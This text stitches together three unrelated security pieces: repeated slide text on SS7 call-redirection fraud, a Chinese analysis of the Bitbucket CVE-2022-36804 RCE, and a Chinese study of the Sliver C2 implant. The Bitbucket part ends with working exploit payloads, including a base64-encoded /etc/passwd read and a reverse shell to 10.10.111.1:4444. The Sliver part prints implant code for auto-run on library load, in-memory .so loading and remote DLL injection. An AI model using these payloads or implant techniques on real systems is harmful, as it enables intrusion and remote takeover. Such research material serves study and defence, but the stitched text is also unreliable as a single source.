Number 88612345670 IMSI 466901234567891 Zimbabwe Voice call redirection with a fraudulent activity Billing GMSC HLR 26121456789 IAM (A-Number, B-Number) SendRoutingInfo (MSISDN) UpdateLocation (IMSI, Fake MSC/VLR) InsertSubscriberData (Profile) ProvideSubscriberInfo (IMSI) ProvideSubscriberInfo (Location = Home) SendRoutingInfo (Location = Home) InitialDP (A-Num, B-Num, Location) ApplyCharging, Continue SendRoutingInfo (MSISDN) Number 88612345670 IMSI 466901234567891 Zimbabwe Voice call redirection with a fraudulent activity Billing GMSC HLR 26121456789 IAM (A-Number, B-Number) SendRoutingInfo (MSISDN) UpdateLocation (IMSI, Fake MSC/VLR) InsertSubscriberData (Profile) ProvideSubscriberInfo (IMSI) ProvideSubscriberInfo (Location = Home) SendRoutingInfo (Location = Home) InitialDP (A-Num, B-Num, Location) ApplyCharging, Continue SendRoutingInfo (MSISDN) Number 88612345670 IMSI 466901234567891 Zimbabwe Voice call redirection with a fraudulent activity Billing GMSC HLR 26121456789 IAM (A-Number, B-Number) SendRoutingInfo (MSISDN) UpdateLocation (IMSI, Fake MSC/VLR) InsertSubscriberData (Profile) ProvideSubscriberInfo (IMSI) ProvideSubscriberInfo (Location = Home) SendRoutingInfo (Location = Home) InitialDP (A-Num, B-Num, Location) ApplyCharging, Continue SendRoutingInfo (MSISDN) ProvideRoaminNumber (IMSI) Number 88612345670 IMSI 466901234567891 Zimbabwe Voice call redirection with a fraudulent activity Billing GMSC HLR 26121456789 IAM (A-Number, B-Number) SendRoutingInfo (MSISDN) UpdateLocation (IMSI, Fake MSC/VLR) InsertSubscriberData (Profile) ProvideSubscriberInfo (IMSI) ProvideSubscriberInfo (Location = Home) SendRoutingInfo (Location = Home) InitialDP (A-Num, B-Num, Location) ApplyCharging, Continue SendRoutingInfo (MSISDN) ProvideRoaminNumber (IMSI) ProvideRoamingNumber (MSRN = 5312345678) Number 88612345670 IMSI 466901234567891 Zimbabwe Voice call redirection with a fraudulent activity Billing GMSC HLR 26121456789 IAM (A-Number, B-Number) SendRoutingInfo (MSISDN) UpdateLocation (IMSI, Fake MSC/VLR) InsertSubscriberData (Profile) ProvideSubscriberInfo (IMSI) ProvideSubscriberInfo (Location = Home) SendRoutingInfo (Location = Home) InitialDP (A-Num, B-Num, Location) ApplyCharging, Continue SendRoutingInfo (MSISDN) ProvideRoaminNumber (IMSI) ProvideRoamingNumber (MSRN = 5312345678) SendRoutingInfo (MSRN = 5312345678) Number 88612345670 IMSI 466901234567891 Zimbabwe Voice call redirection with a fraudulent activity Billing GMSC HLR UpdateLocation (IMSI, Fake MSC/VLR) InsertSubscriberData (Profile) IAM (A-Number, B-Number) SendRoutingInfo (MSISDN) ProvideSubscriberInfo (IMSI) ProvideSubscriberInfo (Location = Home) SendRoutingInfo (Location = Home) InitialDP (A-Num, B-Num, Location) ApplyCharging, Continue SendRoutingInfo (MSISDN) ProvideRoaminNumber (IMSI) ProvideRoamingNumber (MSRN = 5312345678) SendRoutingInfo (MSRN = 5312345678) IAM (A-Number, 5312345678) 26121456789 Number 88612345670 IMSI 466901234567891 Zimbabwe Cuba Who pays? Billing GMSC HLR UpdateLocation (IMSI, Fake MSC/VLR) InsertSubscriberData (Profile) IAM (A-Number, B-Number) SendRoutingInfo (MSISDN) ProvideSubscriberInfo (IMSI) ProvideSubscriberInfo (Location = Home) SendRoutingInfo (Location = Home) InitialDP (A-Num, B-Num, Location) ApplyCharging, Continue SendRoutingInfo (MSISDN) ProvideRoaminNumber (IMSI) ProvideRoamingNumber (MSRN = 5312345678) SendRoutingInfo (MSRN = 5312345678) IAM (A-Number, 5312345678) 26121456789 Number 88612345670 IMSI 466901234567891 Zimbabwe Cuba Who pays? Billing GMSC HLR UpdateLocation (IMSI, Fake MSC/VLR) InsertSubscriberData (Profile) IAM (A-Number, B-Number) SendRoutingInfo (MSISDN) ProvideSubscriberInfo (IMSI) ProvideSubscriberInfo (Location = Home) SendRoutingInfo (Location = Home) InitialDP (A-Num, B-Num, Location) ApplyCharging, Continue SendRoutingInfo (MSISDN) ProvideRoaminNumber (IMSI) ProvideRoamingNumber (MSRN = 5312345678) SendRoutingInfo (MSRN = 5312345678) IAM (A-Number, 5312345678) 26121456789 Number 88612345670 IMSI 466901234567891 Zimbabwe Cuba Who pays? Billing GMSC HLR UpdateLocation (IMSI, Fake MSC/VLR) InsertSubscriberData (Profile) IAM (A-Number, B-Number) SendRoutingInfo (MSISDN) ProvideSubscriberInfo (IMSI) ProvideSubscriberInfo (Location = Home) SendRoutingInfo (Location = Home) InitialDP (A-Num, B-Num, Location) ApplyCharging, Continue SendRoutingInfo (MSISDN) ProvideRoaminNumber (IMSI) ProvideRoamingNumber (MSRN = 5312345678) SendRoutingInfo (MSRN = 5312345678) IAM (A-Number, 5312345678) 26121456789 Number 88612345670 IMSI 466901234567891 Zimbabwe Cuba Thank you! ptsecurity.com
1 【CVE-2022-36804】bitbucket 前台RCE漏洞 Critical severity command injection vulnerability - CVE-OLOO-PTWLQ patch#N patch#O 分析N 分析O: 分析猜想 补丁分析 事后诸葛亮 (N)为什么是%LL (O)为什么不能命令注⼊,只能参数注⼊ (P)为什么是git archive? EXP Ref 官⽅通告:https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center- advisory-2022-08-24-1155489835.html 准备diff下8.3.0 - 8.3.1,顺便熟悉下idea diff jar包的流程: https://product-downloads.atlassian.com/software/stash/downloads/atlassian-bitbucket- 8.3.0-x64.bin https://product-downloads.atlassian.com/software/stash/downloads/atlassian-bitbucket- 8.3.1-x64.bin 分析patch,发现了两处可疑的点: Critical severity command injection vulnerability - CVE-2022-36804 ● ● 2 found bitbucket/atlassian-bitbucket-8.3.0-x64/app/WEB-INF/lib/nuprocess-2.0. 2-atlassian-3.jar!/com/zaxxer/nuprocess/NuProcessBuilder.class the patch#1 is like: patch#1 3 新加了⼀个⽅法 ensureNoNullCharacters command.indexOf(0),查找command⾥⾯有没有 \u0000 这个字符 如果有,就直接抛异常, Commands may not contain null characters ,poc⾥⾯可加下 这个提示值 全量补丁在下⾯: ● ● this.ensureNoNullCharacters(commands); 1 Plain Text 复制代码 private void ensureNoNullCharacters(List<String> commands) { Iterator var2 = commands.iterator(); String command; do { if (!var2.hasNext()) { return; } command = (String)var2.next(); } while(command.indexOf(0) < 0); throw new IllegalArgumentException("Commands may not contain null char acters"); } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 Java 复制代码 4 public class NuProcessBuilder { private static final NuProcessFactory factory; private final List<String> command; private final TreeMap<String, String> environment; private Path cwd; private NuProcessHandler processListener; public NuProcessBuilder(List<String> commands, Map<String, String> env ironment) { if (commands != null && !commands.isEmpty()) { this.ensureNoNullCharacters(commands); //patch this.environment = new TreeMap(environment); this.command = new ArrayList(commands); } else { throw new IllegalArgumentException("List of commands may not b e null or empty"); } } public NuProcessBuilder(List<String> commands) { if (commands != null && !commands.isEmpty()) { this.ensureNoNullCharacters(commands); //patch this.environment = new TreeMap(System.getenv()); this.command = new ArrayList(commands); } else { throw new IllegalArgumentException("List of commands may not b e null or empty"); } } public NuProcessBuilder(String... commands) { if (commands != null && commands.length != 0) { List<String> commandsList = Arrays.asList(commands); //patc h this.ensureNoNullCharacters(commandsList); //patch this.environment = new TreeMap(System.getenv()); this.command = new ArrayList(commandsList); } else { throw new IllegalArgumentException("List of commands may not b e null or empty"); } } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 Java 复制代码 5 another patch is at bitbucket/atlassian-bitbucket-8.3.0-x64/app/WEB-INF/lib/bitb ucket-process-8.3.1.jar 增加了调⽤ 全⽂是 Also, for those who's not familiar with NuProcessBuilder , check: https://github.com/brettwooldridge/NuProcess patch#2 addIf(NioProcessParameters$Builder::nonNullAndNoNullChar, this.argument s, value); 1 Plain Text 复制代码 private static boolean nonNullAndNoNullChar(String value) { if (value == null) { return false; } else { requireNoNullChars(value); return true; } } private static void requireNoNullChars(String value) { if (value.indexOf(0) >= 0) { throw new IllegalArgumentException("Unsupported \\0 character detected: " + value); } } private static String requireNonBlankAndNoNullChar(String value, Strin g msg) { requireNonBlank(value, msg); requireNoNullChars(value); return value; } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 Java 复制代码 6 NuProcess 是开源的代码,便于在不同操作系统下⾯执⾏命令,bitbucket⽤的是atlanssian⾃⼰魔改 了的版本 再往下跟,最终定位到NuProcess,绿⾊部分是补丁新增的内容 public class NuProcessBuilder { //... static { String factoryClassName = null; String osname = System.getProperty("os.name").toLowerCase(); if (!osname.contains("mac") && !osname.contains("freebsd")) { if (osname.contains("win")) { factoryClassName = "com.zaxxer.nuprocess.windows.WinProces sFactory"; } else if (osname.contains("linux")) { factoryClassName = "com.zaxxer.nuprocess.linux.LinProcessF actory"; } else if (osname.contains("sunos")) { factoryClassName = "com.zaxxer.nuprocess.solaris.SolProces sFactory"; } } else { factoryClassName = "com.zaxxer.nuprocess.osx.OsxProcessFactor y"; } if (factoryClassName == null) { throw new RuntimeException("Unsupported operating system: " + osname); } else { try { Class<?> forName = Class.forName(factoryClassName); factory = (NuProcessFactory)forName.newInstance(); } catch (Exception var3) { throw new RuntimeException(var3); } } } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 Java 复制代码 7 After analysing the old version of nuprocess, it turns out to be functional updates, not security patch. ⼀开始分析atlanssian家魔改的nuprocess,以为是有安全加固,结果只是feature的更新。 分析相关代码,关键字 NuProcess , 发现 分析1 8 漏洞可能是利⽤ \u0000 来进⾏某些bypass操作,命令注⼊,Null Byte Injection 2022年9⽉16⽇,看了安全客上的分析⽂章<https://www.anquanke.com/post/id/280193> 思路对了,只是差⼀些。 参数注⼊ ● bitbucket基于Java开发,底层调⽤了git命令,分隔符就是null byte( 0x00 ) ● Null byte可以注⼊的字符,注⼊恶意参数。 官⽅披露的漏洞效果是仅在有只读权限情况下可以进⾏命令执⾏,通过枚举应⽤所有只读权限情况下可以构造 的 git 指令,找到⼀处进⾏参数注⼊,构造恶意 url 访问即可造成任意命令执⾏。 atlassian-bitbucket-8.3.0-x64/app/WEB-INF/classes/stash-context.xml NuNioProcess NioProcess NioNuProcessHandler exitHandler commandLine NioProcessParameters nonNullAndNoNullChar this.arguments # install 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 Plain Text 复制代码 9 测试了相关payload,发现并不会被我的断点断下来,费解。 应该是滥⽤的archive模块(https://git-scm.com/docs/git-archive),因为在git的源代码⾥⾯,只有 archive有remote参数 8.3.0-8.3.1的升级内容⾥,主要涉及到两个⽂件: bitbucket/atlassian-bitbucket-8.3.0-x64/app/WEB-INF/lib/nuprocess-2.0.2 -atlassian-3.jar 分析2: 分析猜想 ● 10 原本开源在gituhb, atlassian开发组对其进⾏了⼆次开发 bitbucket/atlassian-bitbucket-8.3.0-x64/app/WEB-INF/lib/bitbucket-proce ss-8.3.0.jar 基本上就是封装了⼀些执⾏命令的函数(如果有调⽤到此处的函数, 很可能存在⻛险) 但是全局没有找到调⽤链,只有⼀个bean id,不知如何触发 (1)在 bitbucket-process-8.3.0.jar 中, 有这两处补丁 函数的定义在下⾯, 就是检测了 \u0000 ——检测NULL时为啥呢? ○ ● ○ ○ 补丁分析 addIf(NioProcessParameters$Builder::nonNullAndNoNullChar, this.arguments, v alue); 1 Java 复制代码 private static boolean nonNullAndNoNullChar(String value) { if (value == null) { return false; } else { requireNoNullChars(value); return true; } } private static void requireNoNullChars(String value) { if (value.indexOf(0) >= 0) { throw new IllegalArgumentException("Unsupported \\0 character detected: " + value); } } private static String requireNonBlankAndNoNullChar(String value, Strin g msg) { requireNonBlank(value, msg); requireNoNullChars(value); return value; } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 Java 复制代码 11 (2) nuprocess-2.0.2-atlassian-3.jar 的补丁 增加了 ensureNoNullCharacters 校验, 12 函数的作⽤,依然是在校验不能有NULL字符。 public class NuProcessBuilder { private static final NuProcessFactory factory; private final List<String> command; private final TreeMap<String, String> environment; private Path cwd; private NuProcessHandler processListener; public NuProcessBuilder(List<String> commands, Map<String, String> env ironment) { if (commands != null && !commands.isEmpty()) { this.ensureNoNullCharacters(commands); //patch this.environment = new TreeMap(environment); this.command = new ArrayList(commands); } else { throw new IllegalArgumentException("List of commands may not b e null or empty"); } } public NuProcessBuilder(List<String> commands) { if (commands != null && !commands.isEmpty()) { this.ensureNoNullCharacters(commands); //patch this.environment = new TreeMap(System.getenv()); this.command = new ArrayList(commands); } else { throw new IllegalArgumentException("List of commands may not b e null or empty"); } } public NuProcessBuilder(String... commands) { if (commands != null && commands.length != 0) { List<String> commandsList = Arrays.asList(commands); //patc h this.ensureNoNullCharacters(commandsList); //patch this.environment = new TreeMap(System.getenv()); this.command = new ArrayList(commandsList); } else { throw new IllegalArgumentException("List of commands may not b e null or empty"); } } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 Java 复制代码 13 所以,为啥要对NULL字符进⾏重重校验? 初步猜测,攻击者通过某种⽅式调⽤了命令执⾏函数,⼿法可能有: 任意对象实例化(类似Spring-Core反序列,更改了某些重要变量;但历史上只有7995端⼝出过反 序列,HTTP端⼝没有) 某些冷⻔Feature,例如scm那⼀堆旧的功能,我未跟进,不过看历史⽂章,可能会有搞头。 再通过NULL字节绕过了某些限制??天⻢⾏空起来。。 暂时 没有找到命令执⾏处的调⽤点 ● ● ● private void ensureNoNullCharacters(List<String> commands) { Iterator var2 = commands.iterator(); String command; do { if (!var2.hasNext()) { return; } command = (String)var2.next(); } while(command.indexOf(0) < 0); throw new IllegalArgumentException("Commands may not contain null char acters"); } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 Java 复制代码 14 在分析安全客的⽂章⽆果之后,终于等到github出了真正PoC(https://github.com/notxesh/CVE- 2022-36804-PoC/blob/main/CVE-2022-36804.py)。 我们来跟⼀跟漏洞的调⽤栈,分析⼀波原因。 ⾸先搞明⽩,这是什么类型的漏洞?——参数注⼊。 在 git archive 命令中,利⽤空字符,注⼊ --exec 选项,从⽽执⾏任意命令。 为了完整地复现这个漏洞,⾸先要回答下⾯⼏个问题: 为什么是 %00 ? 为什么只能注⼊选项,不能直接⽤&&、||等符号来命令注⼊? 为什么是git archive? 这个问题的⼀个反⾯是,为啥 %00 可以注⼊参数,但是常⽤的空格 %20 却不⾏。 事后诸葛亮 ● ● ● (1)为什么是 %00 在bash下测试,发现空字符在bash中会被忽略。 可⻅空字符并不是bash中默认的分隔符(delimiter)。 15 那思路往回⾛,bitbucket后台是如何拼接git命令的呢?回头去看安全客的那篇⽂章,⾥⾯提到bitbucket 拼接命令的关键函数: $ printf "cat\\x00/etc/passwd" |sh sh: line 1: cat/etc/passwd: No such file or directory 1 2 Bash 复制代码 16 import java.util.*; import java.lang.*; import java.util.ArrayList; import java.util.Arrays; public class check_null { public static void main(String xyz[]) { String[] stringArray = new String[]{"git", "archive", "Hello\u0000 World!", "-- "}; List<String> command = new ArrayList(Arrays.asList(stringArray)); String[] cmdarray = (String[])command.toArray(new String[0]); byte[][] args = new byte[cmdarray.length - 1][]; System.out.println( args ); int size = args.length; // 取 git 命令数组参数,第0位之后,存储到 args[][] for(int i = 0; i < args.length; ++i) { args[i] = cmdarray[i + 1].getBytes(); size += args[i].length; } // 最终存储参数的 byte数组 argBlock byte[] argBlock = new byte[size]; int i = 0; byte[][] var9 = args; int var10 = args.length; for(int var11 = 0; var11 < var10; ++var11) { byte[] arg = var9[var11]; // 使⽤ system.arraycopy 将 arg[][] ⼆维数组拷⻉到 argBlock System.arraycopy(arg, 0, argBlock, i, arg.length); i += arg.length + 1; } System.out.println(args); System.out.println(argBlock); } } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 8.3.0\app\WEB-INF\lib\nuprocess-2.0.2-atlassian-3.jar!\com\zaxxer\… Java 复制代码 17 可以看出,输⼊的参数是⼀个命令数组,返回的是参数列表。经过它的处理,我们 Hello\u0000Worl d! ⾥⾯的 NUL 字符,浑⽔摸⻥地加到了参数⾥⾯,示意图如下: 于是我们现在实现了参数注⼊。 同样的,command会解析成arg_list,参数列表,所以我们能够通过注⼊空字节,来增加参数。 但是并不能改变执⾏顺序,也不能通过增加逻辑运算符来命令注⼊、 所以,我们没法直接⽤&&、||进⾏参数注⼊(改变执⾏逻辑/执⾏顺序),只能想办法加恶意的选项。 因为,git archive可以未授权访问,对应前台的下载功能。 (2)为什么不能命令注⼊,只能参数注⼊ 常识: {"git", "--prefix=<INJECT>"} ,若 <INJECT> 可控,也不能注⼊其它的命令。因为 此时执⾏命令的主体是git,⽽不是其它可执⾏⽂件。第⼆个参数的所有内容,都只会被视为是git命令 的选项。 (3)为什么是git archive? # 输⼊ {"git", "archive", "Hello\u0000World!", "-- "}; # 输出 [a, r, c, h, i, v, e, <NUL>, H, e, l, l, o, <NUL>, W, o, r, l, d, !, <NUL> , -, -, , <NUL>] == {'archive', 'Hello', 'World!', '--' } 1 2 3 4 5 6 7 Java 复制代码 18 archive有 --exec 选项,可以被滥⽤来执⾏命令。 注意:执⾏的命令并⾮完全回显,会被截断;视作⽆回显的RCE就⾏了 例如,执⾏ cat /etc/passwd ,只显示了 root EXP https://github.com/notxesh/CVE-2022-36804-PoC/blob/main/CVE-2022-36804.py # rce rmat=zip&&path=&prefix=test/%00--remote=''%00--exec=echo+'Y2F0IC9ldGMvcGFzc 3dkCg=='+%7c+base64+-d++%7c+sh;%00 # 反弹shell rmat=zip&=&path=&prefix=test/%00--remote=''%00--exec=echo+'YmFzaCAtaSA%2bJi AvZGV2L3RjcC8xMC4xMC4xMTEuMS80NDQ0IDA%2bJjEK'+%7c+base64+-d++%7c+sh;%00 1 2 3 4 5 6 Basic 复制代码 19 Install Note:https://confluence.atlassian.com/bitbucketserver/supported-platforms- 776640981.html https://www.geek-share.com/detail/2803770907.html https://www.anquanke.com/post/id/280193 Ref ● ● ● ● 📎2019第五届互联⽹安全领袖峰会_对基于Git的版本控制服务的通⽤攻击⾯的探索.pdf
Sliver 是一个基于Go的开源、跨平台的红队平台,可供各种规模的组织用于执行安全测试。 Sliver 的木马 支持 C2 over Mutual-TLS、HTTP(S) 和 DNS等协议。 implant可以时时编译生成,并会使 用证书进行加密。 基于Go语言的特性,服务器和客户端以及implant都支持 MacOS、Windows 和 Linux。 Github地址:https://github.com/BishopFox/sliver tag:v1.4.22 go语言越来越流行,并且作为红队使用语言有很多优势。它十分简单,代码可以轻松编译为native代码 到各类平台,跨平台开发非常容易。像py2exe和jar2exe,因为没有流行的软件,它们生成的工具很容 易被杀毒针对,而golang编写的软件像docker等,让杀软无法直接查杀golang语言本身的特征,这更方 便红队开发进行隐藏自己。 重要的是,已经有很多开源的,成熟的用于红队的代码,sliver就是其中之一。所以学习下sliver的代 码,主要积累一些相关的go代码,学习基于go的C2是怎么做的,方便之后自己写C2。 本文将主要总结Sliver c2的功能原理、代码结构、以及对抗方面的内容。 使用&简介 sliver运行需要配置一些环境变量,如go、gcc,方便生成木马时候进行编译,在kali下运行十分简单, 因为kali已经内置了这些变量,只需要在下载页面https://github.com/BishopFox/sliver/releases 下载 最新的 sliver-server_linux ,解压后直接运行即可。 输入 http -l 8888 用于开启一个基于http 8888端口的C2 输入 generate --http 生成一个基于http的c2木马。 它生成的时候默认会使用 garble 对implant源码进行一遍混淆,能够防止被分析。 sliver之前的版本使用的gobfuscate,在源码层面修改变量以及代码结构,速度比较慢,相比之下 garble是对中间编译环节进行混淆结构,速度比较快也能混淆大部分符号等信息。 生成完毕后的exe被点击后 使用 use [id] 选择要控制的机器即可对它进行操控了。 代码简介 sliver的代码结构中有三大组件 implant 植入物,有点拗口,可以理解为“木马” server teamserver,也可以进行交互操作 client 多用户时可以使用的交互客户端 这三个组件即构成了Sliver的C2服务,server也实现了client的功能,client就是使用rpc调用server的功 能,所以大部分情况下看server和implant就行了。 官方Readme上的一些Features和它的实现方式。 Dynamic code generation 动态代码生成,就是动态生成go源码然后编译 Compile-time obfuscation 使用go-obf混淆生成的go代码 Multiplayer-mode 支持多用户模式 Staged and Stageless payloads Staged 主要是调用msf来生成的payload Procedurally generated C2 over HTTP(S) http混淆协议 Base64 Base64 with a custom alphabet so that it's not interoperable with standard Base64 Hex Standard hexadecimal encoding with ASCII characters Gzip Standard gzip English Encodes arbitrary data as English ASCII text PNG Encodes arbitrary data into valid PNG image files Gzip+English A combination of the Gzip and English encoders Base64+Gzip A combination of the Base64 and Gzip encoders [DNS canary] blue team detection 使用DNS诱饵域名 发现蓝队 Secure C2 over mTLS, WireGuard, HTTP(S), and DNS C2通信支持的协议 mTLS, WireGuard, HTTP(S), DNS Fully scriptable using JavaScript/TypeScript or Python 支持使用JavaScript和Python编写脚本 Local and remote process injection 本地和远程进程注入 Windows process migration Windows user token manipulation Anti-anti-anti-forensics 对抗 Let's Encrypt integration Let's Encrypt集成 In-memory .NET assembly execution Implant implant是sliver c2的“木马”部分,也是整个c2的核心部分。sliver 的implant是支持跨平台的,三个平台 功能的基本功能基本上都有,但每个平台的支持程度还是稍有差异。但是它对windows平台的功能显然 更多一点。 sliver的提供了三种选项编译implant,编译成shellcode、编译成第三方库,和编译成exe。对于 windows,还支持生成 windows service 、 windows regsvr32/ PowerSploit 类型的文件,后两种 格式,其实就是一种含有特殊导出表的DLL。 编译成第三方库 能分别生成 .dll 、 .dylib 、 .so 文件,主要依赖cgo,要调用c语言编译器。所以想在server上多端生 成,要下载各个平台的交叉编译器。 主要就是 sliver.c 实现的。 #include "sliver.h" #ifdef __WIN32 DWORD WINAPI Enjoy() {    RunSliver();    return 0; } BOOL WINAPI DllMain(    HINSTANCE _hinstDLL, // handle to DLL module    DWORD _fdwReason,    // reason for calling function    LPVOID _lpReserved)  // reserved {    switch (_fdwReason)   {    case DLL_PROCESS_ATTACH:        // Initialize once for each new process.        // Return FALSE to fail DLL load.   {        // {{if .Config.IsSharedLib}}        HANDLE hThread = CreateThread(NULL, 0, Enjoy, NULL, 0, NULL);        // CreateThread() because otherwise DllMain() is highly likely to deadlock.        // {{end}}   }    break;    case DLL_PROCESS_DETACH:        // Perform any necessary cleanup.        break;    case DLL_THREAD_DETACH:        // Do thread-specific cleanup.        break;    case DLL_THREAD_ATTACH:        // Do thread-specific initialization.        break;   }    return TRUE; // Successful. } #elif __linux__ #include <stdlib.h> void RunSliver(); static void init(int argc, char **argv, char **envp) {    unsetenv("LD_PRELOAD");    unsetenv("LD_PARAMS");    RunSliver(); } __attribute__((section(".init_array"), used)) static typeof(init) *init_p = init; #elif __APPLE__ #include <stdlib.h> void RunSliver(); __attribute__((constructor)) static void init(int argc, char **argv, char **envp) {    unsetenv("DYLD_INSERT_LIBRARIES");    unsetenv("LD_PARAMS");    RunSliver(); } windows在dllmain里面启动一个线程执行go函数,mac和linux直接再 init 上执行go函数。 编译成shellcode 只能在windows下使用,在 server\generate\binaries.go 编译shellcode,首先编译成dll,然后会使用go-donut github.com/binject/go-donut/donut 进行转 换为shellcode。 donut 可以将任意的exe、dll、.net等等程序转换为shellcode,go-donut 是donut 的go实现,关于 donut ,模仿cs开局一个shellcode的实现.md 有讲述相关原理。 功能 在大体看了implant代码后,我画了一张思维导图用来描述sliver c2 implant所具有的功能和技术。 #endif 功能详情 sideload 主要用于加载并执行库文件 Darwin 在本进程执行shellcode sideload 这个会写出文件,将库文件写到tmp目录,指定环境变量 DYLD_INSERT_LIBRARIES 为文件路 径 func LocalTask(data []byte, rwxPages bool) error { dataAddr := uintptr(unsafe.Pointer(&data[0])) page := getPage(dataAddr) syscall.Mprotect(page, syscall.PROT_READ|syscall.PROT_EXEC) dataPtr := unsafe.Pointer(&data) funcPtr := *(*func())(unsafe.Pointer(&dataPtr)) runtime.LockOSThread() defer runtime.UnlockOSThread() go func(fPtr func()) { fPtr() }(funcPtr) return nil } // Sideload - Side load a library and return its output func Sideload(procName string, data []byte, args string, kill bool) (string, error) { var ( stdOut bytes.Buffer stdErr bytes.Buffer wg     sync.WaitGroup ) fdPath := fmt.Sprintf("/tmp/.%s", randomString(10)) err := ioutil.WriteFile(fdPath, data, 0755) if err != nil { return "", err } env := os.Environ() newEnv := []string{ fmt.Sprintf("LD_PARAMS=%s", args), fmt.Sprintf("DYLD_INSERT_LIBRARIES=%s", fdPath), } env = append(env, newEnv...) cmd := exec.Command(procName) cmd.Env = env cmd.Stdout = &stdOut cmd.Stderr = &stdErr //{{if .Config.Debug}} log.Printf("Starting %s\n", cmd.String()) linux 无文件落地、内存执行.so,原理是使用 memfd_create ,允许我们在内存中创建一个文件,但是它在内 存中的存储并不会被映射到文件系统中,执行程序时候设置环境变量 LD_PRELOAD ,预加载so文件 //{{end}} wg.Add(1) go startAndWait(cmd, &wg) // Wait for process to terminate wg.Wait() // Cleanup os.Remove(fdPath) if len(stdErr.Bytes()) > 0 { return "", fmt.Errorf(stdErr.String()) } //{{if .Config.Debug}} log.Printf("Done, stdout: %s\n", stdOut.String()) log.Printf("Done, stderr: %s\n", stdErr.String()) //{{end}} return stdOut.String(), nil } // Sideload - Side load a library and return its output func Sideload(procName string, data []byte, args string, kill bool) (string, error) { var ( nrMemfdCreate int stdOut        bytes.Buffer stdErr        bytes.Buffer wg            sync.WaitGroup ) memfdName := randomString(8) memfd, err := syscall.BytePtrFromString(memfdName) if err != nil { //{{if .Config.Debug}} log.Printf("Error during conversion: %s\n", err) //{{end}} return "", err } if runtime.GOARCH == "386" { nrMemfdCreate = 356 } else { nrMemfdCreate = 319 } fd, _, _ := syscall.Syscall(uintptr(nrMemfdCreate), uintptr(unsafe.Pointer(memfd)), 1, 0) pid := os.Getpid() fdPath := fmt.Sprintf("/proc/%d/fd/%d", pid, fd) err = ioutil.WriteFile(fdPath, data, 0755) if err != nil { //{{if .Config.Debug}} log.Printf("Error writing file to memfd: %s\n", err) //{{end}} return "", err } //{{if .Config.Debug}} Windows 1. 使用 DuplicateHandle ,将句柄从一个进程复制到另一个进程 2. 在目标进程创建内存并使用创建远程线程执行dll log.Printf("Data written in %s\n", fdPath) //{{end}} env := os.Environ() newEnv := []string{ fmt.Sprintf("LD_PARAMS=%s", args), fmt.Sprintf("LD_PRELOAD=%s", fdPath), } env = append(env, newEnv...) cmd := exec.Command(procName) cmd.Env = env cmd.Stdout = &stdOut cmd.Stderr = &stdErr //{{if .Config.Debug}} log.Printf("Starging %s\n", cmd.String()) //{{end}} wg.Add(1) go startAndWait(cmd, &wg) // Wait for process to terminate wg.Wait() if len(stdErr.Bytes()) > 0 { return "", fmt.Errorf(stdErr.String()) } //{{if .Config.Debug}} log.Printf("Done, stdout: %s\n", stdOut.String()) log.Printf("Done, stderr: %s\n", stdErr.String()) //{{end}} return stdOut.String(), nil } func SpawnDll(procName string, data []byte, offset uint32, args string, kill bool) (string, error) { var lpTargetHandle windows.Handle err := refresh() if err != nil { return "", err } var stdoutBuff bytes.Buffer var stderrBuff bytes.Buffer // 1 - Start process cmd, err := startProcess(procName, &stdoutBuff, &stderrBuff, true) if err != nil { return "", err } pid := cmd.Process.Pid // {{if .Config.Debug}} log.Printf("[*] %s started, pid = %d\n", procName, pid) // {{end}} handle, err := windows.OpenProcess(syscalls.PROCESS_DUP_HANDLE, true, uint32(pid)) if err != nil { return "", err } currentProcHandle, err := windows.GetCurrentProcess() if err != nil { // {{if .Config.Debug}} log.Println("GetCurrentProcess failed") // {{end}} return "", err } err = windows.DuplicateHandle(handle, currentProcHandle, currentProcHandle, &lpTargetHandle, 0, false, syscalls.DUPLICATE_SAME_ACCESS) if err != nil { // {{if .Config.Debug}} log.Println("DuplicateHandle failed") // {{end}} return "", err } defer windows.CloseHandle(handle) defer windows.CloseHandle(lpTargetHandle) dataAddr, err := allocAndWrite(data, lpTargetHandle, uint32(len(data))) argAddr := uintptr(0) if len(args) > 0 { //{{if .Config.Debug}} log.Printf("Args: %s\n", args) //{{end}} argsArray := []byte(args) argAddr, err = allocAndWrite(argsArray, lpTargetHandle, uint32(len(argsArray))) if err != nil { return "", err } } //{{if .Config.Debug}} log.Printf("[*] Args addr: 0x%08x\n", argAddr) //{{end}} startAddr := uintptr(dataAddr) + uintptr(offset) threadHandle, err := protectAndExec(lpTargetHandle, dataAddr, startAddr, argAddr, uint32(len(data))) if err != nil { return "", err } // {{if .Config.Debug}} log.Printf("[*] RemoteThread started. Waiting for execution to finish.\n") // {{end}} if kill { err = waitForCompletion(threadHandle) if err != nil { return "", err } // {{if .Config.Debug}} log.Printf("[*] Thread completed execution, attempting to kill remote process\n") // {{end}} cmd.Process.Kill() return stdoutBuff.String() + stderrBuff.String(), nil } return "", nil } netstack proxy shell 注入技术 系统代理 通信流程 implant支持 mtls 、 WireGuard 、 http/https 、 dns 、 namedpipe 、 tcp 等协议的上线, namedpipe 、 tcp 用于内网,加密程度不高,主要看看其他的。 HTTP/HTTPS implant实现 implant在初始化时,会首先请求服务器获得一个公钥,再生成一个随机的AESKEY,用公钥加密后发送 到服务器,服务器确认后返回一个sessionid表示注册,后续implant只需要通过发送sessionid到服务 器,服务器即可根据sessionid找到对应的aeskey解密数据。 sliver的implant、client、server,所有通信的数据都是基于Go的struct,再经过 proto3 编码为字节发 送。关于 proto3 ,后面有介绍。 请求 随机编码器,通过随机数每次请求都会使用随机的编码器,在原aeskey的基础再次进行一次编码 uri的参数 _ 用来标记编码器的数字 通过cookie 标记sessionid 用 PHPSESSID 来传递sessionid 